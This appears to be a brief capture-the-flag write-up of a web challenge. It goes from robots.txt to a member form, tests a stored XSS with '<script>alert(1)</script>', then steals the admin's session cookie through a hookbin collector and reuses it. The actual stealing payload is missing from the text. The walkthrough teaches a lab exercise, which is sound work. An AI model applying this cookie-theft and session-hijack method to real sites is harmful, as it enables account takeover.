/robots.txt has some Disallows
User-agent: * Disallow: /admin Disallow: /todo
Admin is a rabbithole.
todo actually has some info.
Looks like there’s a new feature that hasn’t been sufficiently tested for security holes.
Register an account to get a look at the member’s area
So we can upload a resume or send a request to the admin? Maybe that’s the form that’s being talked about in
Let’s test this by sending an XSS payload
<script>alert(1)</script> in the content field
Interesting, we can review the report? Let’s see if our XSS fired!
So XXS is in play. If the admin is checking, maybe we can steal the cookies?
I’m going to use
hookbin and this payload:
Sending that as the content of our request, let’s see if we get anything on our
Is that the cookie we want? Let’s see what happens if we use that one instead of the one we have
Now we can capture the flag :)